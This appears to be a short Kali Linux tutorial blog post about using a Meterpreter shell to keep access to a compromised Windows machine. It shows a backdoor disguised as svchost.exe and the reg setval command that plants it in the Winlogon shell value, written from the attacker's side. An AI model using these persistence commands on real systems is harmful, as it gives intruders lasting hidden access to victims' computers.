If Kali Linux has acquired a meterpreter shell of the victim's system, the shell supports a variety of attack commands, including system privilege escalation, keylogging, snapshots, registry, and processes.

It supports the ability to manipulate the registry among attack commands, which is that the session breaks when the victim reboots, so if the backdoor is registered in the automatic registry, the session continues.

Kali Linux Registry

An attacker uploads a backdoor (svchost.exe) to a specific location to infiltrate the victim's system later after successful penetration. Also, register the backdoor in the start registry so that the victim automatically connects with the attacker upon reboot.


Kali Linux Registry Manipulation

Once the registry has been tampered with in the meterpreter shell, go to the victim's system and run the Registry Editor window. When you navigate to the startup registry path, the svchost.exe is registered.

⊙ reg enumkey

○ Enumerate registry keys

○ reg enumkey -k "HKLM\\software\\microsoft\\windows nt\\currentversion\\winlogon"

○ -k : registry path

⊙ reg queryval

○ Query registry keys

○ reg queryval -k "HKLM\\software\\microsoft\\windows nt\\currentversion\\winlogon" -v shell

○ -k : registry path

○ -v : Registry Value Name

⊙ reg setval

○ Add/modify registry values

○ reg setval -k "HKLM\\software\\microsoft\\windows nt\\currentversion\\winlogon" -v shell -d "explorer.exe C:\\Windows\svchost.exe"

▶ 칼리리눅스 SSL Strip 공격 방어

▶ 칼리리눅스 초기설정

  • 카카오톡-공유
  • 네이버-블로그-공유
  • 네이버-밴드-공유
  • 페이스북-공유
  • 트위터-공유
  • 카카오스토리-공유

댓글을 달아 주세요